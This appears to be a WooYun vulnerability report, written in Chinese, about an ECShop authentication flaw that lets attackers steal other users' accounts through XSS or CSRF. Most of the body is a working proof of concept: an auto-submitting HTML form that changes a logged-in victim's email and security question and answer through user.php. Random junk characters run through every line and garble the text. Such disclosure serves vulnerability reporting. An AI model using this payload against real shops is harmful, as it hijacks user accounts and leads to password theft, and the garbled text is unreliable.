简要描述:4 ?; K; R+ g8 l3 `
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
1 J- b* M* g; l0 x: m( p
) [% l( |4 w8 a. [' h1 v# RDemo For:http://www.wooyun.org/bug.php?action=view&id=3953 t& \$ w. {1 T9 M1 _# A5 f* x8 a/ _
5 U3 A. v+ Q9 G8 t
详细说明:- I. K6 |' L0 p: i6 Q% N
利用csrf和xss可以突破官方所说的“障碍”) I9 L4 m# m1 Z, Z) F7 Y
xss版本已经有人说明
0 [" X, r9 N1 C/ j! `+ E# h这里给出csrf版本8 F3 n# i/ ^+ y+ i
0 g! j9 F- i5 T* ?3 \/ F漏洞证明:
) {- w# X; E0 L, n<html>$ r/ G/ W% e0 c6 s, p% I# a
<body>8 A$ A$ H% O. L7 p3 D5 N
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
- f' d6 i T1 g ~ q. P<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
4 r: [) ?7 ~+ t! @5 t& X<INPUT TYPE="text" NAME="act" value="act_edit_profile">
4 v6 o$ I: o7 E) C) ^4 w, a<INPUT TYPE="text" NAME="sel_question" value="ecshop">1 i3 b8 Y( V( L# e
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">2 @7 x4 L( V) C$ {2 U
</body># B8 Y* \9 ?1 Q. v r" {
<script>5 U, p, H- K$ j- G* O
document.forms[0].submit();% I- a9 s9 o" C4 T' O
</script>
) D( p3 `+ L, }' }' X# Y</html>1 L+ g$ u1 d$ M! |7 \
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失- i: T. X3 T# N: f
^/ G/ t6 h) E' k; L" d+ y% s! R7 T9 Y
|